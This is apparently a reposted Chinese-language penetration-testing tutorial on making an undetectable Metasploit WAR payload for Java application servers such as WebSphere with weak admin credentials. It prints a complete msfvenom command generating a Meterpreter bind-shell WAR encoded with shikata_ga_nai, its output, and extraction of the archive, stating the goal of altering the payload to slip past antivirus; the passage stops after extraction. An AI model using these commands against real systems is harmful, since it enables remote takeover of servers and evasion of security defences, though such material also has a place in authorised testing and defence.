打造不被检测的Metasploit WAR

来源：http://www.mottoin.com/90302.html

在渗透测试期间，目标服务器如果是Windows的，目标服务器可能安装有JAVA版管理管理控制程序（例如：WAS、JBOSS和Tomcat），该服务器具有默认或者是可猜测（可以进行爆破攻击）的管理凭据。

一种思路是上传一个Metasploit生成的WAR应用程序以便成功控制服务器，不过结果往往不尽人意…

我们的实验环境中，使用IBM的Websphere Application Server (WAS)，WAS使用端口为：9060/HTTP或者9043/HTTPS：

http://IP:9060/ibm/console
https://IP:9043/ibm/consoler

注意: WAS通常使用本地管理员权限运行，所以通过上传执行payload可以取得管理员权限。

使用msfvenom生成WAR应用程序，如下所示：

/tmp# msfvenom --platform windows -a x86 -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 2 LPORT=8484 -f war -o /tmp/OSI.war
Found 1 compatible encoders
Attempting to encode payload with 2 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai chosen with final size 353
Payload size: 353 bytes
Final size of war file: 52278 bytes
Saved as: /tmp/OSI.war

大多数杀毒软件能够检测出来msfvenom生成的恶意软件。我们尝试分析WAF文件，看一下WAF的那部分代码负责恶意软件检测并尝试修改恶意软件代码以便绕过检测。

msfvenom生成的简单WAR文件包含两个文件夹（META-INF和WEB-INF），.txt和.jsp文件，可以按如下方式解压缩：

/tmp# jar –xvf OSI.war
created: META-INF/
inflated: META-INF/MANIFEST.MF
created: WEB-INF/
inflated: WEB-INF/web.xml
inflated: aprhqsfojqku.jsp
inflated: pNJrRWnay.txt